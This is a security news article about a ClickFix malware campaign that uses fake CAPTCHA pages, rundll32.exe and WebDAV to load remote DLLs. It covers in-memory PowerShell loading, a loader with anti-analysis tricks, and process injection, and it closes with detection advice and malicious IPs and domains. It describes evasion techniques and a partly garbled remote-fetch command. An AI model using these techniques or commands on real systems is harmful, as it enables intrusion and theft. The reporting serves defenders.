ClickFix Malware Uses Rundll32, WebDAV to Evade PowerShell Detection
Key Takeaways A new, more sophisticated variant of the ClickFix attack is actively targeting Windows users. This iteration leverages native Windows components, specifically rundll32.exe and WebDAV,...
Key Takeaways
- A new, more sophisticated variant of the ClickFix attack is actively targeting Windows users.
- This iteration leverages native Windows components, specifically rundll32.exe and WebDAV, to bypass traditional PowerShell-focused security detections.
- The attack chain employs advanced evasion techniques, including in-memory execution, API hashing, and sandbox/debugger detection, making it harder to analyze and detect.
- Initial access relies on social engineering via a fake CAPTCHA website instructing users to manually execute a malicious command.
- Defenders must broaden their monitoring to include native Windows binaries and implement robust user awareness training to counter this evolving threat.
ClickFix Malware Evades Detection with Rundll32 and WebDAV
A significantly evolved form of the ClickFix attack technique is now actively compromising Windows users, moving away from its predecessors’ reliance on PowerShell or mshta for command execution. This latest variant strategically employs rundll32.exe and WebDAV, two legitimate, built-in Windows functionalities, to silently deliver and execute malicious payloads, thereby circumventing many common security alerts.
Table Of Content
This tactical shift presents a considerable challenge for cybersecurity defenses, particularly for organizations whose detection mechanisms are primarily configured to identify script-based threats. ClickFix attacks are notorious for manipulating users into inadvertently executing harmful commands on their own systems.
Social Engineering at the Core
The current campaign begins with a deceptive website, artfully disguised as a CAPTCHA verification page, identified as “healthybyhillary[.]com.” This site meticulously guides visitors to press Win + R to open the Windows Run dialog, paste a pre-copied malicious command using Ctrl + V, and then press Enter to initiate execution. This seemingly innocuous sequence is a highly effective social engineering tactic, exploiting users’ unfamiliarity with such attack vectors.

Analysts at CyberProof identified this new ClickFix variant during ongoing threat monitoring. Their findings highlight its reduced dependence on commonly scrutinized scripting engines. Instead of an initial direct call to PowerShell, the attack leverages rundll32.exe in conjunction with the WebDAV mini-redirector. This allows Windows to access remote files over HTTP, treating them as if they reside on a local network share.
Consequently, the malicious DLL file is retrieved from an attacker-controlled server using a command structure such as rundll32.exe [email protected],#1. The #1 component refers to an export function identified by an ordinal number rather than a human-readable name, adding an additional layer of obfuscation.
The implications of this altered methodology are substantial. Security teams with detection rules predominantly focused on PowerShell, mshta, or similar scripting engines are likely to miss the initial stages of this attack. The malware’s activities blend seamlessly into legitimate Windows operations, as rundll32.exe is a trusted system utility frequently used by benign applications. This enables initial access and payload delivery with minimal forensic footprint, providing attackers with a stealthy entry point into target environments.

Detection Evasion Through Native Windows Components and In-Memory Execution
What makes this ClickFix variant particularly formidable is its sophisticated handling of post-initial-execution stages. Once rundll32.exe successfully retrieves and loads the remote DLL via WebDAV, the infection transitions into a multi-stage process that largely remains in memory. While PowerShell is eventually invoked, it occurs at a later phase, utilizing Invoke-Expression (IEX) alongside Net.WebClient.DownloadString to fetch and execute subsequent payloads without writing them to disk. Non-interactive flags like -NoP and -NonI are employed during PowerShell execution to minimize its visibility.

The primary payload in this chain is a secondary loader dubbed SkimokKeep, delivered as a 32-bit Windows DLL named verification.google. This loader incorporates several advanced techniques to evade detection. Instead of standard Windows API function imports, it traverses the Process Environment Block (PEB) to locate loaded system modules and resolves functions using a DJB2-style hashing algorithm. This method conceals the specific system functions the malware utilizes, significantly complicating static analysis.

Furthermore, the payload incorporates checks for sandbox and virtual machine environments using functions such as GetSystemMetrics, GetForegroundWindow, and GetSystemTime to detect atypical conditions often present in automated analysis systems. It also implements anti-debugging measures, including timing assessments with GetTickCount and process ID inspections, which can alter the malware’s behavior or halt its execution if it suspects it is being scrutinized.
Telemetry data further indicates that rundll32.exe injects code into legitimate running processes like chrome.exe and msedge.exe by modifying their memory space. This tactic helps the malware sustain access while maintaining stealth.

What You Should Do
- Monitor Rundll32.exe activity: Implement rigorous monitoring for all executions of rundll32.exe, particularly those that include
davclnt.dllandDavSetCookiearguments, as these are strong indicators of WebDAV-based payload delivery. - Enhance Command-Line Auditing: Enable and review command-line auditing for known Living Off the Land Binaries (LOLBins), including rundll32.exe, to identify and flag unusual usage patterns promptly.
- Restrict WebDAV Traffic: Limit or closely supervise outbound WebDAV traffic on port 80, especially in environments where it is not essential for operational needs.
- Block Malicious Infrastructure: Configure firewalls and intrusion prevention systems to block connections to known malicious IP addresses, including 178.16.53[.]137, 141.98.234[.]27, 46.149.73[.]60, and 91.219.23[.]245, as well as suspicious domains such as mer-forgea.sightup[.]in[.]net and data-x7-sync.neurosync[.]in[.]net.
- Improve User Awareness Training: Conduct regular and focused user awareness training sessions that specifically address fake CAPTCHA pages and ClickFix-style social engineering attacks. The success of these campaigns hinges entirely on users following deceptive on-screen instructions.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.